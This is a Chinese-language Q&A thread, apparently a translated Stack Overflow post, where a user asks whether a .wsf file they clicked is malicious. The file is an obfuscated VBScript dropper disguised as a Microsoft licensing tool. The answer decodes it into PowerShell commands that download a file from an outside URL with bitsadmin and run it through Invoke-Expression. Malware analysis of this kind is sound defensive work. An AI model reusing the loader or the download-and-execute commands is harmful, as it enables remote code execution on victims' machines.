1

今天早上我收到了一个恶意文件,其中包含一个扩展名为 .wsf 的文件,我无意中点击了该文件。

我立即意识到我犯了一个错误......但为时已晚:(你能告诉我它是否是恶意代码吗?

这是代码:

<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' Copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
 Set ISUaUv=WScript.CreateObject("WScript.Shell")
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next
ISUaUv.run KcSOUa,false,-1
Next

</script></job></package>

谢谢!

4

1 回答 1

1

它混淆了自己的事实是一个很好的指标,它可能是恶意的,如果你想看看它试图运行什么,你可以;

注释掉这一行(如下所示);

'ISUaUv.run KcSOUa,false,-1

在它下面添加这一行;

WScript.Echo KcSOUa

当你运行脚本时,你会得到这个输出;

输出:

powershell -c ""&bitsadmin  /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
powershell  -c  & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex

从第一行来看,该脚本正在使用BITSAdmin 服务(内置于 Windows)来启动从远程 URL 到存储在用户配置文件 AppData 文件夹中的本地 XLS 文件的下载。至于第二个,我不清楚它的作用,但具有更多 PowerShell 知识的人将能够阐明它。

更新

它看起来正在使用gcGet-ContentPowerShell中的小程序)使用命令将文件的内容拉入字符串Out-String。然后它通过管道将其传递给iexInvoke-Expression命令)以执行。

下载的inter.xls文件很可能包含恶意命令,这些命令随后在本地系统的上下文中被本地执行。这是绕过远程代码执行的经典脚本小子黑客。

于 2021-05-10T09:58:36.780 回答